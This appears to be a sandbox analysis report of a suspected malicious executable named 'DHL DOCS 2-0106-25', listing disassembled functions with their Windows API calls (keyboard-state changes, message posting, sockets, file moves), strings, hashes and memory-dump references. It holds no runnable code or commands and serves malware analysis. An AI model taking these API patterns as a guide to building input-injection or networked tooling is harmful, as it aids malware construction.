Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: c3daca114d72d3ea0de22820e32401c4780f30bdb0b8580a307a53d4dca553e2
Instruction ID: ae48cb915d76f649bec304ce7093606b37173506d9d89f7f1ecf5041abffc444
Opcode Fuzzy Hash: c3daca114d72d3ea0de22820e32401c4780f30bdb0b8580a307a53d4dca553e2
Instruction Fuzzy Hash: 4191B4B1E20215ABDF24DFA4CC45FAEBBB8EF46714F108599F505AB280D770A951CFA0

Function 00221187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0022125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00221284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 002212A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002212D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0022135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002213C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00221430

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 719e32815e108491652e6857bab410f37b420e677bae3c88030b4a789f141ba6
Instruction ID: c55fb7394279ab455df819bcf6adef689edfae07f60555f362bb763315080f17
Opcode Fuzzy Hash: 719e32815e108491652e6857bab410f37b420e677bae3c88030b4a789f141ba6
Instruction Fuzzy Hash: D391D275910229AFEB00DFD8E884FBE77B5FF65314F104129E900E7291D774A961CB90

Function 001C948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 6bdd232932ba77679222b6257325b2b1c80f6d76a652428c6f01334a0b3019b4
Instruction ID: 58c4f06e0f5f15b1d9132009da857a83fe91c96da7fa653e96c2506d4b75d7bf
Opcode Fuzzy Hash: 6bdd232932ba77679222b6257325b2b1c80f6d76a652428c6f01334a0b3019b4
Instruction Fuzzy Hash: AC912671E00219EFCB14CFA9CC88AEEBBB8FF59320F14855AE515B7291D774A941CB60

Function 00233947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0023396B
CharUpperBuffW.USER32(?,?), ref: 00233A7A
_wcslen.LIBCMT ref: 00233A8A
VariantClear.OLEAUT32(?), ref: 00233C1F

Part of subcall function 00220CDF: VariantInit.OLEAUT32(00000000), ref: 00220D1F
Part of subcall function 00220CDF: VariantCopy.OLEAUT32(?,?), ref: 00220D28
Part of subcall function 00220CDF: VariantClear.OLEAUT32(?), ref: 00220D34

Strings

AUTOIT.ERROR, xrefs: 00233A80, 00233A85
Incorrect Parameter format, xrefs: 002339A6, 00233BA1

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: f5faea1f734dc3d42aa893f244f344107c3e1bc8d7e65adc9efde290f30accea
Instruction ID: 5de5a82ea740cc031ceca79ba36ecf1f5ce91728b54c6b7dec6955fcb5ba4ef2
Opcode Fuzzy Hash: f5faea1f734dc3d42aa893f244f344107c3e1bc8d7e65adc9efde290f30accea
Instruction Fuzzy Hash: 529169B46183059FC704DF24C48196AB7E5FF99314F14886EF88A9B351DB30EE56CB92

Function 00234BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0021000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0020FF41,80070057,?,?,?,0021035E), ref: 0021002B
Part of subcall function 0021000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0020FF41,80070057,?,?), ref: 00210046
Part of subcall function 0021000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0020FF41,80070057,?,?), ref: 00210054
Part of subcall function 0021000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0020FF41,80070057,?), ref: 00210064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00234C51
_wcslen.LIBCMT ref: 00234D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00234DCF
CoTaskMemFree.OLE32(?), ref: 00234DDA

Strings

NULL Pointer assignment, xrefs: 00234E23, 00234E52

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 997d5cf7b880abdae0eca16018062c2e5f98158edd96cd7ab5fb0d10a56ecbcc
Instruction ID: 363e19c8d822627530ccfad4f52d49d13051fa99da1f5c3170327b4dd08da5dd
Opcode Fuzzy Hash: 997d5cf7b880abdae0eca16018062c2e5f98158edd96cd7ab5fb0d10a56ecbcc
Instruction Fuzzy Hash: EA914AB1D1021DAFDF14EFA4D881AEEB7B8FF18304F10416AE915A7251DB70AA55CF60

Function 002420FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00242183
GetMenuItemCount.USER32(00000000), ref: 002421B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002421DD
_wcslen.LIBCMT ref: 00242213
GetMenuItemID.USER32(?,?), ref: 0024224D
GetSubMenu.USER32(?,?), ref: 0024225B

Part of subcall function 00213A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00213A57
Part of subcall function 00213A3D: GetCurrentThreadId.KERNEL32 ref: 00213A5E
Part of subcall function 00213A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002125B3), ref: 00213A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002422E3

Part of subcall function 0021E97B: Sleep.KERNEL32 ref: 0021E9F3

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 083db5dc7348b0fb2307fa0c85e5b6cfbb5099e3c25865dac1dc0f919ef647e7
Instruction ID: e749ba8e557948468d2f5262907c7ad444c16f64eee5dfc347bdc654e4b72e3e
Opcode Fuzzy Hash: 083db5dc7348b0fb2307fa0c85e5b6cfbb5099e3c25865dac1dc0f919ef647e7
Instruction Fuzzy Hash: 45717D75A10205EFCB14DF69C845AAEBBF5AF88310F508499F81AEB341DB74ED458B90

Function 0021AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0021AEF9
GetKeyboardState.USER32(?), ref: 0021AF0E
SetKeyboardState.USER32(?), ref: 0021AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0021AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0021AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0021AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0021B020

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 77a893accb3afe3cedfc6f45b2dda83ca2f377d79413ce0412ce63e117b40d6a
Instruction ID: c5fee2de9eaa67df906aa73e80b77f5bf34995608042a99289f03c62a58b5f32
Opcode Fuzzy Hash: 77a893accb3afe3cedfc6f45b2dda83ca2f377d79413ce0412ce63e117b40d6a
Instruction Fuzzy Hash: 5851F4A0A253D23DFB374A348C45BFA7EE95B16304F088489F1D9458C2C3E9ACE9D761

Function 0021ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0021AD19
GetKeyboardState.USER32(?), ref: 0021AD2E
SetKeyboardState.USER32(?), ref: 0021AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0021ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0021ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0021AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0021AE38

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: d3341ae80fe7e434212e4f7b8b64fa017e3bbf2705b22c21af476875d197693f
Instruction ID: c121a3ecb978ab7890174a54ba61201d4d5d9f52f936bf5f04949b555d997510
Opcode Fuzzy Hash: d3341ae80fe7e434212e4f7b8b64fa017e3bbf2705b22c21af476875d197693f
Instruction Fuzzy Hash: 7E5106A09267D23DFB378B348C45BFA7EE85B56300F088498E0D5468C3C2A4ECE8D752

Function 001E542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(001F3CD6,?,?,?,?,?,?,?,?,001E5BA3,?,?,001F3CD6,?,?), ref: 001E5470
__fassign.LIBCMT ref: 001E54EB
__fassign.LIBCMT ref: 001E5506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,001F3CD6,00000005,00000000,00000000), ref: 001E552C
WriteFile.KERNEL32(?,001F3CD6,00000000,001E5BA3,00000000,?,?,?,?,?,?,?,?,?,001E5BA3,?), ref: 001E554B
WriteFile.KERNEL32(?,?,00000001,001E5BA3,00000000,?,?,?,?,?,?,?,?,?,001E5BA3,?), ref: 001E5584

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 5ebe59035bd0e13fde34c94c1772a96f1cd996de14c1c05e99c4e51da360a737
Instruction ID: b9f597a8a2250c69942ebaa4b2f90ec501a55f59214b8a0505d7a383a1d833e6
Opcode Fuzzy Hash: 5ebe59035bd0e13fde34c94c1772a96f1cd996de14c1c05e99c4e51da360a737
Instruction Fuzzy Hash: 52512A70A00A489FDB14CFA9DC85AEEBBF6EF09304F24415AF555E7291D730DA40CB60

Function 00246B76 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00246C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00246C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00246C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0022AB79,00000000,00000000), ref: 00246C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00246CC7

Strings

8], xrefs: 00246BB0, 00246C55

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID: 8]
API String ID: 3688381893-438778366
Opcode ID: 2f7cd2c42b0cab58088b81777cd1a27ccc899be0f64628524505fd265997f441
Instruction ID: b27398e79ffef281ef291057ee7a3f9d14a96311514f419e21e6635f72edbbb5
Opcode Fuzzy Hash: 2f7cd2c42b0cab58088b81777cd1a27ccc899be0f64628524505fd265997f441
Instruction Fuzzy Hash: 2141D735A24105AFD72CCF68DC9CFA97BA9EB0B350F150269F895A72E0C371ED61CA41

Function 001C912D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 001C9141
ScreenToClient.USER32(00000000,?), ref: 001C915E
GetAsyncKeyState.USER32(00000001), ref: 001C9183
GetAsyncKeyState.USER32(00000002), ref: 001C919D

Strings

6108eadbb521b84b53f064453b6d3bf2dfaa9eb9b97bb32aaaa089afceee8863c42717a00113dcea431e2105feb644a5af1ddb388d80dd5c6c6c89cd10b059b2c3, xrefs: 00207152

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID: 6108eadbb521b84b53f064453b6d3bf2dfaa9eb9b97bb32aaaa089afceee8863c42717a00113dcea431e2105feb644a5af1ddb388d80dd5c6c6c89cd10b059b2c3
API String ID: 4210589936-3293970949
Opcode ID: 2fe1b61018c9bf7e217b0bb872e582f8f756d8c138fab6fe56e6d671e0c94fb2
Instruction ID: a82aaab5a1738aaa6be66b2988d291a308b19cb4fcf135b65006266d6a313bc6
Opcode Fuzzy Hash: 2fe1b61018c9bf7e217b0bb872e582f8f756d8c138fab6fe56e6d671e0c94fb2
Instruction Fuzzy Hash: 34415131A0860BEBDF199F64C849BEEF775FB15330F244219E429A22D1C770A964CF91

Function 001D2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 001D2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 001D2D53
_ValidateLocalCookies.LIBCMT ref: 001D2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 001D2E0C
_ValidateLocalCookies.LIBCMT ref: 001D2E61

Strings

csm, xrefs: 001D2DF6

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 357838e37b920316add8f55f783d66e9e44a5c0e1c687314012fa769721fe00f
Instruction ID: 4175e75fcc9922be34f4cff29ebeb81fc63b74666a99f5804897117cf304dccb
Opcode Fuzzy Hash: 357838e37b920316add8f55f783d66e9e44a5c0e1c687314012fa769721fe00f
Instruction Fuzzy Hash: 6E41B434E00209EBCF14DFA8CC85A9EBBB5BF65324F148156E9246B392D731AE15CBD1

Function 002310B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0023304E: inet_addr.WSOCK32(?), ref: 0023307A
Part of subcall function 0023304E: _wcslen.LIBCMT ref: 0023309B

socket.WSOCK32(00000002,00000001,00000006), ref: 00231112
WSAGetLastError.WSOCK32 ref: 00231121
WSAGetLastError.WSOCK32 ref: 002311C9
closesocket.WSOCK32(00000000), ref: 002311F9

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 1cc13b5557f0c85c5f63c19f3aeed9332807180ffd01cba96346b07edf9cdecc
Instruction ID: 5c7c94172720abcae1ad0857d26cc6a35dae92ad05a5af70f2eca31912b94ca0
Opcode Fuzzy Hash: 1cc13b5557f0c85c5f63c19f3aeed9332807180ffd01cba96346b07edf9cdecc
Instruction Fuzzy Hash: 854112B5210204AFDB109F18D888BEABBE9EF45324F148059FD499B291C7B0EE51CBE0

Function 0021CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0021DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0021CF22,?), ref: 0021DDFD

Part of subcall function 0021DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0021CF22,?), ref: 0021DE16

lstrcmpiW.KERNEL32(?,?), ref: 0021CF45
MoveFileW.KERNEL32(?,?), ref: 0021CF7F
_wcslen.LIBCMT ref: 0021D005
_wcslen.LIBCMT ref: 0021D01B
SHFileOperationW.SHELL32(?), ref: 0021D061

Strings

\*.*, xrefs: 0021CFF3

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 231be70322b3a95f31462b99159c6588198142ea8b0aae084d1f40c8b0311e51
Instruction ID: 232433c414e50c1468727b772a90ddb9880f271b6d0c91eaf416bd5cb1750fdd
Opcode Fuzzy Hash: 231be70322b3a95f31462b99159c6588198142ea8b0aae084d1f40c8b0311e51
Instruction Fuzzy Hash: 0F4185758552199FDF12EFA4D981ADEB7F9AF28340F1000E6E509EB141EB30AA99CF50

Function 00217726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00217769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0021778F
SysAllocString.OLEAUT32(00000000), ref: 00217792
SysAllocString.OLEAUT32(?), ref: 002177B0
SysFreeString.OLEAUT32(?), ref: 002177B9
StringFromGUID2.OLE32(?,?,00000028), ref: 002177DE
SysAllocString.OLEAUT32(?), ref: 002177EC

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: a240d977aa026419e08b40073cd775e5880ffaaeaf8515c07aaa8fbbea691cad
Instruction ID: edfac4d4feba534ca1146d3510529d99cdd6448986e78e4c6be8f0b17e22e51d
Opcode Fuzzy Hash: a240d977aa026419e08b40073cd775e5880ffaaeaf8515c07aaa8fbbea691cad
Instruction Fuzzy Hash: 0D21E23A61420AAFDB00EFACDC88CFBB3ECEB59760B108025F915CB190D670DC828760

Function 002177FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00217842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00217868
SysAllocString.OLEAUT32(00000000), ref: 0021786B
SysAllocString.OLEAUT32 ref: 0021788C
SysFreeString.OLEAUT32 ref: 00217895
StringFromGUID2.OLE32(?,?,00000028), ref: 002178AF
SysAllocString.OLEAUT32(?), ref: 002178BD

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 49327f8d5fd85128899d2e9e9c062e861baa4fee4b3b4282db28bbf64d29d508
Instruction ID: a14924b740362468d2c340f3977d796eb7c6610bfdb67ebb8a879337757837b0
Opcode Fuzzy Hash: 49327f8d5fd85128899d2e9e9c062e861baa4fee4b3b4282db28bbf64d29d508
